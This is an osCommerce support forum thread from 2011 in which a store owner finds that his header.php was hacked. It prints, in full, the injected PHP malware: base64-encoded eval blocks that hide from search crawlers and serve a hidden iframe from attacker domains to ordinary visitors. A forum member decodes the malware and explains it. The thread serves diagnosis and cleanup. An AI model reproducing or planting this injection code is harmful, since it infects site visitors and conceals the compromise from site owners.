racerxx Posted February 12, 2011 Share Posted February 12, 2011 All of the sudden when I try and browse to my store catalog, I am getting the following error message: Parse error: syntax error, unexpected '<' in /home/xxxxxxxx/public_html/catalog/includes/header.php on line 1 If I refresh the page, I then get the following error message: Fatal error: Call to a member function add_current_page() on a non-object in /home/xxxxxxx/public_html/catalog/includes/application_top.php on line 312 My catalog has been working fine for several months and then two days ago this problem started. I'm pretty new to oscommerce and just not sure how to go about fixing this problem. Link to comment Share on other sites More sharing options...
Guest Posted February 12, 2011 Share Posted February 12, 2011 Troy, Download and open the header.php file in your text editor. Look on line one for the < that is causing the problem. I am going to guess that if you did not make changes to the website, then you have been hacked. In which case you will need to clean the entire site, apply the security patches and security contributions to secure it. The other error is will correct itself. Chris Link to comment Share on other sites More sharing options...
racerxx Posted February 12, 2011 Author Share Posted February 12, 2011 Chris, Thanks for the reply. Here are the first few lines of catalog/includes/header.php <?php /* $Id: header.php,v 1.42 2003/06/10 18:20:38 hpdl Exp $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright (c) 2003 osCommerce Released under the GNU General Public License */ // check if the 'install' directory exists, and warn of its existence if (WARN_INSTALL_EXISTENCE == 'true') { if (file_exists(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/install')) { $messageStack->add('header', WARNING_INSTALL_DIRECTORY_EXISTS, 'warning'); } } // check if the configure.php file is writeable if (WARN_CONFIG_WRITEABLE == 'true') { if ( (file_exists(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/includes/configure.php')) && (is_writeable(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/includes/configure.php')) ) { $messageStack->add('header', WARNING_CONFIG_FILE_WRITEABLE, 'warning'); } } Link to comment Share on other sites More sharing options...
racerxx Posted February 12, 2011 Author Share Posted February 12, 2011 I guess it doesn't like something in the first <?php tag? <?php /* $Id: header.php,v 1.42 2003/06/10 18:20:38 hpdl Exp $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com Copyright (c) 2003 osCommerce Released under the GNU General Public License */ // check if the 'install' directory exists, and warn of its existence if (WARN_INSTALL_EXISTENCE == 'true') { if (file_exists(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/install')) { $messageStack->add('header', WARNING_INSTALL_DIRECTORY_EXISTS, 'warning'); } } // check if the configure.php file is writeable if (WARN_CONFIG_WRITEABLE == 'true') { if ( (file_exists(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/includes/configure.php')) && (is_writeable(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/includes/configure.php')) ) { $messageStack->add('header', WARNING_CONFIG_FILE_WRITEABLE, 'warning'); } } // check if the session folder is writeable if (WARN_SESSION_DIRECTORY_NOT_WRITEABLE == 'true') { if (STORE_SESSIONS == '') { if (!is_dir(tep_session_save_path())) { $messageStack->add('header', WARNING_SESSION_DIRECTORY_NON_EXISTENT, 'warning'); } elseif (!is_writeable(tep_session_save_path())) { $messageStack->add('header', WARNING_SESSION_DIRECTORY_NOT_WRITEABLE, 'warning'); } } } // check session.auto_start is disabled if ( (function_exists('ini_get')) && (WARN_SESSION_AUTO_START == 'true') ) { if (ini_get('session.auto_start') == '1') { $messageStack->add('header', WARNING_SESSION_AUTO_START, 'warning'); } } if ( (WARN_DOWNLOAD_DIRECTORY_NOT_READABLE == 'true') && (DOWNLOAD_ENABLED == 'true') ) { if (!is_dir(DIR_FS_DOWNLOAD)) { $messageStack->add('header', WARNING_DOWNLOAD_DIRECTORY_NON_EXISTENT, 'warning'); } } if ($messageStack->size('header') > 0) { echo $messageStack->output('header'); } ?> Link to comment Share on other sites More sharing options...
Guest Posted February 12, 2011 Share Posted February 12, 2011 Troy, I really don't see a problem with the file from what you have provided. Ensure there is no whitespace before the <?php tag. Other than that, I am not sure what the problem could be. Chris Link to comment Share on other sites More sharing options...
germ Posted February 12, 2011 Share Posted February 12, 2011 Since there's nothing in that file to cause the error, I'd guess you didn't download the file from the server before posting. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
racerxx Posted February 12, 2011 Author Share Posted February 12, 2011 Well, you both were right. It turns out I wasn't logging into the server with the correct username and I didn't know I wasn't looking at the same files on the server. I was looking at another copy of the website and not the live version. No wonder I was about to pull my hair out! yes, there turned out to be a whole lot of junk at the top of header.php so after replacing the file with a backup copy everything works again. I'm not sure if that page was "hacked" or Dreamweaver somehow corrupted it? DW did become disconnected from the site yesterday and I did have to reconfigure it DW. That's when I used the wrong username. Thanks for your help! Troy Link to comment Share on other sites More sharing options...
germ Posted February 13, 2011 Share Posted February 13, 2011 If the "junk" contained ANY of these php keywords the page was hacked: eval or gzinflate or base64_decode If any of those were present I'd be checking the ENTIRE site with a fine toothed comb. :blush: If it all was just "gobbbledy gook" (unreadable text) your explanation will suffice. :) If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
racerxx Posted February 13, 2011 Author Share Posted February 13, 2011 I guess it looks like I was "hacked": <?<?<?<?<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwokYm90ID0gRkFMU0UgOwokdXNlcl9hZ2VudF90b19maWx0ZXIgPSBhcnJheSgnYm90Jywnc3BpZGVyJywnc3B5ZGVyJywnY3Jhd2wnLCd2YWxpZGF0b3InLCdzbHVycCcsJ2RvY29tbycsJ3lhbmRleCcsJ21haWwucnUnLCdhbGV4YS5jb20nLCdwb3N0cmFuay5jb20nLCdodG1sZG9jJywnd2ViY29sbGFnZScsJ2Jsb2dwdWxzZS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJzEyMzQ1JywnaHR0cGNsaWVudCcsJ2J1enp0cmFja2VyLmNvbScsJ3Nub29weScsJ2ZlZWR0b29scycsJ2FyaWFubmEubGliZXJvLml0JywnaW50ZXJuZXRzZWVyLmNvbScsJ29wZW5hY29vbi5kZScsJ3JycnJycnJycicsJ21hZ2VudCcsJ2Rvd25sb2FkIG1hc3RlcicsJ2RydXBhbC5vcmcnLCd2bGMgbWVkaWEgcGxheWVyJywndnZya2ltc2p1d2x5IGwzdWZtanJ4Jywnc3puLWltYWdlLXJlc2l6ZXInLCdiZGJyYW5kcHJvdGVjdC5jb20nLCd3b3JkcHJlc3MnLCdyc3NyZWFkZXInLCdteWJsb2dsb2cgYXBpJyk7CiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KAoJYXJyYXkoIjIxNi4yMzkuMzIuMCIsIjIxNi4yMzkuNjMuMjU1IiksCglhcnJheSgiNjQuNjguODAuMCIgICwiNjQuNjguODcuMjU1IiAgKSwKCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksCglhcnJheSgiNjQuMjMzLjE2MC4wIiwiNjQuMjMzLjE5MS4yNTUiKSwKCWFycmF5KCI2Ni4yNDkuNjQuMCIsICI2Ni4yNDkuOTUuMjU1IiksCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLAoJYXJyYXkoIjIwOS44NS4xMjguMCIsIjIwOS44NS4yNTUuMjU1IiksCglhcnJheSgiMTk4LjEwOC4xMDAuMTkyIiwiMTk4LjEwOC4xMDAuMjA3IiksCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwKCWFycmF5KCIyMTYuMzMuMjI5LjE0NCIsIjIxNi4zMy4yMjkuMTUxIiksCglhcnJheSgiMjE2LjMzLjIyOS4xNjAiLCIyMTYuMzMuMjI5LjE2NyIpLAoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLAoJYXJyYXkoIjIxNi4xMDkuNzUuODAiLCIyMTYuMTA5Ljc1Ljk1IiksCglhcnJheSgiNjQuNjguODguMCIsIjY0LjY4Ljk1LjI1NSIpLAoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksCglhcnJheSgiNjQuNDEuMjIxLjE5MiIsIjY0LjQxLjIyMS4yMDciKSwKCWFycmF5KCI3NC4xMjUuMC4wIiwiNzQuMTI1LjI1NS4yNTUiKSwKCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksCglhcnJheSgiNzQuNi4wLjAiLCI3NC42LjI1NS4yNTUiKSwKCWFycmF5KCI2Ny4xOTUuMC4wIiwiNjcuMTk1LjI1NS4yNTUiKSwKCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksCglhcnJheSgiMzguMC4wLjAiLCIzOC4yNTUuMjU1LjI1NSIpCgkpOwokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7CmZvcmVhY2ggKCAkc3RvcF9pcHNfbWFza3MgYXMgJElQcyApIHsKCSRmaXJzdF9kPXNwcmludGYoIiV1IixpcDJsb25nKCRJUHNbMF0pKTsgJHNlY29uZF9kPXNwcmludGYoIiV1IixpcDJsb25nKCRJUHNbMV0pKTsKCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQp9CmZvcmVhY2ggKCR1c2VyX2FnZW50X3RvX2ZpbHRlciBhcyAkYm90X3NpZ24pewoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30KfQppZiAoISRib3QpIHsNCmVjaG8gJzxpZnJhbWUgc3JjPSJodHRwOi8vaG5kZmRmbmZkbnhkbmYudnYuY2MvUVFrRkJnMEFBUTBNQkEwREVrY0pCUVlOQXdjQ0FRTU1Bdz09IiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2lmcmFtZT4nOw0KfQ==')); eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwokYm90ID0gRkFMU0UgOwokdXNlcl9hZ2VudF90b19maWx0ZXIgPSBhcnJheSgnYm90Jywnc3BpZGVyJywnc3B5ZGVyJywnY3Jhd2wnLCd2YWxpZGF0b3InLCdzbHVycCcsJ2RvY29tbycsJ3lhbmRleCcsJ21haWwucnUnLCdhbGV4YS5jb20nLCdwb3N0cmFuay5jb20nLCdodG1sZG9jJywnd2ViY29sbGFnZScsJ2Jsb2dwdWxzZS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJzEyMzQ1JywnaHR0cGNsaWVudCcsJ2J1enp0cmFja2VyLmNvbScsJ3Nub29weScsJ2ZlZWR0b29scycsJ2FyaWFubmEubGliZXJvLml0JywnaW50ZXJuZXRzZWVyLmNvbScsJ29wZW5hY29vbi5kZScsJ3JycnJycnJycicsJ21hZ2VudCcsJ2Rvd25sb2FkIG1hc3RlcicsJ2RydXBhbC5vcmcnLCd2bGMgbWVkaWEgcGxheWVyJywndnZya2ltc2p1d2x5IGwzdWZtanJ4Jywnc3puLWltYWdlLXJlc2l6ZXInLCdiZGJyYW5kcHJvdGVjdC5jb20nLCd3b3JkcHJlc3MnLCdyc3NyZWFkZXInLCdteWJsb2dsb2cgYXBpJyk7CiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KAoJYXJyYXkoIjIxNi4yMzkuMzIuMCIsIjIxNi4yMzkuNjMuMjU1IiksCglhcnJheSgiNjQuNjguODAuMCIgICwiNjQuNjguODcuMjU1IiAgKSwKCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksCglhcnJheSgiNjQuMjMzLjE2MC4wIiwiNjQuMjMzLjE5MS4yNTUiKSwKCWFycmF5KCI2Ni4yNDkuNjQuMCIsICI2Ni4yNDkuOTUuMjU1IiksCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLAoJYXJyYXkoIjIwOS44NS4xMjguMCIsIjIwOS44NS4yNTUuMjU1IiksCglhcnJheSgiMTk4LjEwOC4xMDAuMTkyIiwiMTk4LjEwOC4xMDAuMjA3IiksCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwKCWFycmF5KCIyMTYuMzMuMjI5LjE0NCIsIjIxNi4zMy4yMjkuMTUxIiksCglhcnJheSgiMjE2LjMzLjIyOS4xNjAiLCIyMTYuMzMuMjI5LjE2NyIpLAoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLAoJYXJyYXkoIjIxNi4xMDkuNzUuODAiLCIyMTYuMTA5Ljc1Ljk1IiksCglhcnJheSgiNjQuNjguODguMCIsIjY0LjY4Ljk1LjI1NSIpLAoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksCglhcnJheSgiNjQuNDEuMjIxLjE5MiIsIjY0LjQxLjIyMS4yMDciKSwKCWFycmF5KCI3NC4xMjUuMC4wIiwiNzQuMTI1LjI1NS4yNTUiKSwKCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksCglhcnJheSgiNzQuNi4wLjAiLCI3NC42LjI1NS4yNTUiKSwKCWFycmF5KCI2Ny4xOTUuMC4wIiwiNjcuMTk1LjI1NS4yNTUiKSwKCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksCglhcnJheSgiMzguMC4wLjAiLCIzOC4yNTUuMjU1LjI1NSIpCgkpOwokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7CmZvcmVhY2ggKCAkc3RvcF9pcHNfbWFza3MgYXMgJElQcyApIHsKCSRmaXJzdF9kPXNwcmludGYoIiV1IixpcDJsb25nKCRJUHNbMF0pKTsgJHNlY29uZF9kPXNwcmludGYoIiV1IixpcDJsb25nKCRJUHNbMV0pKTsKCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQp9CmZvcmVhY2ggKCR1c2VyX2FnZW50X3RvX2ZpbHRlciBhcyAkYm90X3NpZ24pewoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30KfQppZiAoISRib3QpIHsNCmVjaG8gJzxpZnJhbWUgc3JjPSJodHRwOi8vMjEyMTU2ZG5mZ2RuLmNvLmNjL1FRa0ZCZzBBQVEwTUJBMERFa2NKQlFZTkF3Y0NBUU1NQXc9PSIgd2lkdGg9IjEiIGhlaWdodD0iMSI+PC9pZnJhbWU+JzsNCn0=')); eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwokYm90ID0gRkFMU0UgOwokdXNlcl9hZ2VudF90b19maWx0ZXIgPSBhcnJheSgnYm90Jywnc3BpZGVyJywnc3B5ZGVyJywnY3Jhd2wnLCd2YWxpZGF0b3InLCdzbHVycCcsJ2RvY29tbycsJ3lhbmRleCcsJ21haWwucnUnLCdhbGV4YS5jb20nLCdwb3N0cmFuay5jb20nLCdodG1sZG9jJywnd2ViY29sbGFnZScsJ2Jsb2dwdWxzZS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJzEyMzQ1JywnaHR0cGNsaWVudCcsJ2J1enp0cmFja2VyLmNvbScsJ3Nub29weScsJ2ZlZWR0b29scycsJ2FyaWFubmEubGliZXJvLml0JywnaW50ZXJuZXRzZWVyLmNvbScsJ29wZW5hY29vbi5kZScsJ3JycnJycnJycicsJ21hZ2VudCcsJ2Rvd25sb2FkIG1hc3RlcicsJ2RydXBhbC5vcmcnLCd2bGMgbWVkaWEgcGxheWVyJywndnZya2ltc2p1d2x5IGwzdWZtanJ4Jywnc3puLWltYWdlLXJlc2l6ZXInLCdiZGJyYW5kcHJvdGVjdC5jb20nLCd3b3JkcHJlc3MnLCdyc3NyZWFkZXInLCdteWJsb2dsb2cgYXBpJyk7CiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KAoJYXJyYXkoIjIxNi4yMzkuMzIuMCIsIjIxNi4yMzkuNjMuMjU1IiksCglhcnJheSgiNjQuNjguODAuMCIgICwiNjQuNjguODcuMjU1IiAgKSwKCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksCglhcnJheSgiNjQuMjMzLjE2MC4wIiwiNjQuMjMzLjE5MS4yNTUiKSwKCWFycmF5KCI2Ni4yNDkuNjQuMCIsICI2Ni4yNDkuOTUuMjU1IiksCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLAoJYXJyYXkoIjIwOS44NS4xMjguMCIsIjIwOS44NS4yNTUuMjU1IiksCglhcnJheSgiMTk4LjEwOC4xMDAuMTkyIiwiMTk4LjEwOC4xMDAuMjA3IiksCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwKCWFycmF5KCIyMTYuMzMuMjI5LjE0NCIsIjIxNi4zMy4yMjkuMTUxIiksCglhcnJheSgiMjE2LjMzLjIyOS4xNjAiLCIyMTYuMzMuMjI5LjE2NyIpLAoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLAoJYXJyYXkoIjIxNi4xMDkuNzUuODAiLCIyMTYuMTA5Ljc1Ljk1IiksCglhcnJheSgiNjQuNjguODguMCIsIjY0LjY4Ljk1LjI1NSIpLAoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksCglhcnJheSgiNjQuNDEuMjIxLjE5MiIsIjY0LjQxLjIyMS4yMDciKSwKCWFycmF5KCI3NC4xMjUuMC4wIiwiNzQuMTI1LjI1NS4yNTUiKSwKCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksCglhcnJheSgiNzQuNi4wLjAiLCI3NC42LjI1NS4yNTUiKSwKCWFycmF5KCI2Ny4xOTUuMC4wIiwiNjcuMTk1LjI1NS4yNTUiKSwKCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksCglhcnJheSgiMzguMC4wLjAiLCIzOC4yNTUuMjU1LjI1NSIpCgkpOwokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7CmZvcmVhY2ggKCAkc3RvcF9pcHNfbWFza3MgYXMgJElQcyApIHsKCSRmaXJzdF9kPXNwcmludGYoIiV1IixpcDJsb25nKCRJUHNbMF0pKTsgJHNlY29uZF9kPXNwcmludGYoIiV1IixpcDJsb25nKCRJUHNbMV0pKTsKCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQp9CmZvcmVhY2ggKCR1c2VyX2FnZW50X3RvX2ZpbHRlciBhcyAkYm90X3NpZ24pewoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30KfQppZiAoISRib3QpIHsNCmVjaG8gJzxpZnJhbWUgc3JjPSJodHRwOi8vaGZzZGgzcjRoc2QuY28uY2MvUVFrRkJnMEFBUTBNQkEwREVrY0pCUVlOQXdjQ0FRTU1Bdz09IiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2lmcmFtZT4nOw0KfQ==')); eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwokYm90ID0gRkFMU0UgOwokdXNlcl9hZ2VudF90b19maWx0ZXIgPSBhcnJheSgnYm90Jywnc3BpZGVyJywnc3B5ZGVyJywnY3Jhd2wnLCd2YWxpZGF0b3InLCdzbHVycCcsJ2RvY29tbycsJ3lhbmRleCcsJ21haWwucnUnLCdhbGV4YS5jb20nLCdwb3N0cmFuay5jb20nLCdodG1sZG9jJywnd2ViY29sbGFnZScsJ2Jsb2dwdWxzZS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJzEyMzQ1JywnaHR0cGNsaWVudCcsJ2J1enp0cmFja2VyLmNvbScsJ3Nub29weScsJ2ZlZWR0b29scycsJ2FyaWFubmEubGliZXJvLml0JywnaW50ZXJuZXRzZWVyLmNvbScsJ29wZW5hY29vbi5kZScsJ3JycnJycnJycicsJ21hZ2VudCcsJ2Rvd25sb2FkIG1hc3RlcicsJ2RydXBhbC5vcmcnLCd2bGMgbWVkaWEgcGxheWVyJywndnZya2ltc2p1d2x5IGwzdWZtanJ4Jywnc3puLWltYWdlLXJlc2l6ZXInLCdiZGJyYW5kcHJvdGVjdC5jb20nLCd3b3JkcHJlc3MnLCdyc3NyZWFkZXInLCdteWJsb2dsb2cgYXBpJyk7CiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KAoJYXJyYXkoIjIxNi4yMzkuMzIuMCIsIjIxNi4yMzkuNjMuMjU1IiksCglhcnJheSgiNjQuNjguODAuMCIgICwiNjQuNjguODcuMjU1IiAgKSwKCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksCglhcnJheSgiNjQuMjMzLjE2MC4wIiwiNjQuMjMzLjE5MS4yNTUiKSwKCWFycmF5KCI2Ni4yNDkuNjQuMCIsICI2Ni4yNDkuOTUuMjU1IiksCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLAoJYXJyYXkoIjIwOS44NS4xMjguMCIsIjIwOS44NS4yNTUuMjU1IiksCglhcnJheSgiMTk4LjEwOC4xMDAuMTkyIiwiMTk4LjEwOC4xMDAuMjA3IiksCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwKCWFycmF5KCIyMTYuMzMuMjI5LjE0NCIsIjIxNi4zMy4yMjkuMTUxIiksCglhcnJheSgiMjE2LjMzLjIyOS4xNjAiLCIyMTYuMzMuMjI5LjE2NyIpLAoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLAoJYXJyYXkoIjIxNi4xMDkuNzUuODAiLCIyMTYuMTA5Ljc1Ljk1IiksCglhcnJheSgiNjQuNjguODguMCIsIjY0LjY4Ljk1LjI1NSIpLAoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksCglhcnJheSgiNjQuNDEuMjIxLjE5MiIsIjY0LjQxLjIyMS4yMDciKSwKCWFycmF5KCI3NC4xMjUuMC4wIiwiNzQuMTI1LjI1NS4yNTUiKSwKCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksCglhcnJheSgiNzQuNi4wLjAiLCI3NC42LjI1NS4yNTUiKSwKCWFycmF5KCI2Ny4xOTUuMC4wIiwiNjcuMTk1LjI1NS4yNTUiKSwKCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksCglhcnJheSgiMzguMC4wLjAiLCIzOC4yNTUuMjU1LjI1NSIpCgkpOwokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7CmZvcmVhY2ggKCAkc3RvcF9pcHNfbWFza3MgYXMgJElQcyApIHsKCSRmaXJzdF9kPXNwcmludGYoIiV1IixpcDJsb25nKCRJUHNbMF0pKTsgJHNlY29uZF9kPXNwcmludGYoIiV1IixpcDJsb25nKCRJUHNbMV0pKTsKCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQp9CmZvcmVhY2ggKCR1c2VyX2FnZW50X3RvX2ZpbHRlciBhcyAkYm90X3NpZ24pewoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30KfQppZiAoISRib3QpIHsNCmVjaG8gJzxpZnJhbWUgc3JjPSJodHRwOi8vZ3NkZ3dyZzIzZ2dkLmNvLmNjL1FRa0ZCZzBBQVEwTUJBMERFa2NKQlFZTkF3Y0NBUU1NQXc9PSIgd2lkdGg9IjEiIGhlaWdodD0iMSI+PC9pZnJhbWU+JzsNCn0=')); I guess I need to do some reading. Link to comment Share on other sites More sharing options...
germ Posted February 13, 2011 Share Posted February 13, 2011 Tips at the link below: How to Secure Your Site If your admin isn't protected by a .htaccess file chances are you're suffering from the "admin vulnerability". I can't be for sure without your URL. If it's any consolation it was a relatively benign hack. Probably all it did was place spam links on the pages when spiders crawled the site. If you look at your page source in the g00gle cache you'll see what I mean. The "junk" decodes to this: error_reporting(0); $bot = FALSE ; $user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api'); $stop_ips_masks = array( array("216.239.32.0","216.239.63.255"), array("64.68.80.0" ,"64.68.87.255" ), array("66.102.0.0", "66.102.15.255"), array("64.233.160.0","64.233.191.255"), array("66.249.64.0", "66.249.95.255"), array("72.14.192.0", "72.14.255.255"), array("209.85.128.0","209.85.255.255"), array("198.108.100.192","198.108.100.207"), array("173.194.0.0","173.194.255.255"), array("216.33.229.144","216.33.229.151"), array("216.33.229.160","216.33.229.167"), array("209.185.108.128","209.185.108.255"), array("216.109.75.80","216.109.75.95"), array("64.68.88.0","64.68.95.255"), array("64.68.64.64","64.68.64.127"), array("64.41.221.192","64.41.221.207"), array("74.125.0.0","74.125.255.255"), array("65.52.0.0","65.55.255.255"), array("74.6.0.0","74.6.255.255"), array("67.195.0.0","67.195.255.255"), array("72.30.0.0","72.30.255.255"), array("38.0.0.0","38.255.255.255") ); $my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR'])); foreach ( $stop_ips_masks as $IPs ) { $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1])); if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;} } foreach ($user_agent_to_filter as $bot_sign){ if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;} } if (!$bot) { echo '<iframe src="http://hndfdfnfdnxdnf.vv.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAwcCAQMMAw==" width="1" height="1"></iframe>'; } If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
germ Posted February 13, 2011 Share Posted February 13, 2011 If "stupid" hurt I'd be in a lot of pain right about now.... :blush: My previous assessment of the code is totally wrong. The code inserts an <iframe> into the page if the page is NOT being crawled by a spider. That way their nefarious purposes are fulfilled and your site doesn't get blacklisted. A year or two ago there were a lot of osC sites that if you looked at their cache in g00gle hundreds of spam links appeared. Looking at the site normally with a browser showed no links. Again the hackers inadmirable purposes are fulfilled and you are none the wiser. The spam was inserted on the page only if you were a crawler, and most people don't bother to check their page source in the g00gle cache. I always wanted to see that code but as far as I know no one ever posted it. I thought you had found my "Holy Grail". This is what I get (appearing like the north end of a southbound mule) for reading code before I've had my morning coffee. :lol: If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.